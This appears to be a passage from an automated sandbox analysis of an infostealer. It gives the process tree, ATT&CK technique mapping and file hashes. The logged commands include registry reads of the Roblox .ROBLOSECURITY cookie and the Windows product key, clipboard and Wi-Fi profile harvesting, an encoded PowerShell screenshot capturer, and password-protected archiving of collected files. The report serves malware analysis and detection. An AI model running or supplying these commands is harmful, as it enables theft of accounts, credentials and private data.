    PID:3192
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      System Location Discovery: System Language Discovery
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3724
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      System Location Discovery: System Language Discovery
      Detects videocard installed
      PID:2480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4388
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:1372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:812
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4648
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      System Location Discovery: System Language Discovery
      PID:808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - System Location Discovery: System Language Discovery
    PID:760
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1576
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:2404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3516
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:3488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:212
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2044
  - - C:\Windows\SysWOW64\systeminfo.exe
      systeminfo
      4⤵
      System Location Discovery: System Language Discovery
      Gathers system information
      PID:4288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4468
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3724
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4992
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1srvhg0s\1srvhg0s.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4648
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE31C.tmp" "c:\Users\Admin\AppData\Local\Temp\1srvhg0s\CSCAEED60CF4B524236834DA43238A5F48E.TMP"
        6⤵
        
        PID:1040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3176
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:3712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3368
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:5008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3712
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:1168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4040
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:760
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5080
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3176
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:1692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4472
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2640
  - - C:\Windows\SysWOW64\getmac.exe
      getmac
      4⤵
      System Location Discovery: System Language Discovery
      PID:3776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4656
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI45202\rar.exe a -r -hp"guhrzz" "C:\Users\Admin\AppData\Local\Temp\5u8jz.zip" *"
    3⤵
    PID:3524
  - - C:\Users\Admin\AppData\Local\Temp\_MEI45202\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI45202\rar.exe a -r -hp"guhrzz" "C:\Users\Admin\AppData\Local\Temp\5u8jz.zip" *
      4⤵
      Executes dropped EXE
      PID:3884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4300
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      System Location Discovery: System Language Discovery
      PID:1168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2656
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:3292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2916
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      System Location Discovery: System Language Discovery
      PID:5044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4372
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1612
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      System Location Discovery: System Language Discovery
      Detects videocard installed
      PID:2728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4620
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2448

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
1⤵
PID:3712

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
9910e411e383057a96d0ddfa0bb88e97

SHA1
e03940dfa64cb00f25c51c3741b5a13566f41cbc

SHA256
ea7a80716ef27c1a02069cacd8a3a7207e8edf5d663bbc31002eac063bbc7176

SHA512
468a0e415e18dd9ea4652090734f86601f882919c34c9f713e42d810ed3ac4ec595c61d9be58ca5e8877a1addaecca4fb27c7faac7f07f9d688d138a01e04361

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
c0106ab50b19092a259e4c83033ea143

SHA1
f9be718e50816e7a8887ff14a4da3c3190e68ac9

SHA256
be03fdbaf2b621b269402913691981c78258f73875965956a1fea9b3e07ce195

SHA512
d52b160951a7d766c1511315b1463b634f904dbbeff2f488e9021831425f7fe07c5b9708a1e6a4e76f422da3dbd7d557194d6eba413da103a4f38e01972c2de2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
5702299aa9d9c9c482ff943ea93d4c98

SHA1
3b95e974e862e122b6354ab2ea5a6465a0cdcce9

SHA256
c3299bd1d7d8895cb847072230cfcae4f7ff33e2a972048b73afeda06d920324

SHA512
b4ddd614dc77e49079c8dccb15f39001c5d7061a138a460d6f8c22e030074d2aa6810db008955e95e04c6ce2df72c035eb5870a5d9793aa4662c9c24c68b3b4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
622819884e151f54228f545311920998

SHA1
f5609cd28074ea9bbcf9d37992f14589cad256cd

SHA256
1fb601effbb9dba1d63ecc2ee240ca04c56cb982b3f6016afb0b3e28631d6eb9

SHA512
7432ac11eab82b321eca57046ed72799387265853f819c000952eaf4a37bb31decc61e32ae01d73df710f037f9b9d657770f6993470fbfe69b769d754745db62

Download Submit
C:\Users\Admin\AppData\Local\Temp\1srvhg0s\1srvhg0s.dll

Filesize
4KB

MD5
42d44be0e37cdbb18633a0da432fe694

SHA1
fa9e9a32ce01b37901229f27d83d4bd216ddc753

SHA256
9733efb88b92c0856e27789cd2b63c0112054dfd4b532b42789ce729e011aad9

SHA512
c9e0feb5105781012da12cf5f611f25eb1376634945eeb865da2431114d65b3bbae356e5a15f833b081c423218414d14a66a9831ba6af49bfeb7aa7003504817

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE31C.tmp

Filesize
1KB

MD5
43c347b7966302436ade5ea3da0e3165

SHA1
39c7b12547144db547663c92e907435334e51dcc

SHA256
64ac1bb0b37ff16c74d965b28b392317be3b770e438cf699a5bca62bdb4811ae

SHA512
2ed0ccd30ac2481a89192b75d34405af2ea63192af11425da015bed3af353936cf5b3984b6526a58bcaeb711b8e22ebd38c1a3750c3d6438de65f1ad55c94eff

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45202\VCRUNTIME140.dll

Filesize
88KB

MD5
a0df29af5f6135b735dee359c0871ecf

SHA1
f7ebb9a9fd00e1ac95537158fae1167b06f490bd

SHA256
35afadbacc9a30341c1a5ee2117e69583e5044cea0bfab636dccbdcc281a8786

SHA512
fdc7a62d0b187829708ec544de52b4037da613e01a7591a2abc55f95c4719ee04f9c51d31f01edb7161b5edc3cd85004c3a55d375116baa76fb44553df592b3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45202\_bz2.pyd

Filesize
43KB

MD5
3866ff87746ae927e1fe71ca8db31d53

SHA1
e5d73084695ed003791e396dbd37a4acb36feb0a

SHA256
416656b11ae6332a2e16ef3c34ec9c85510c1402192265c1c4e675ad070c1ed2

SHA512
a9322f049477b64c1ef7971f0fb9a1ccc859c8a3821ba43abf9f3c4d3f116e238565db73f8af89bd43de9c6615b593d06fb9538ae2f4f86073236d26d26b87dc

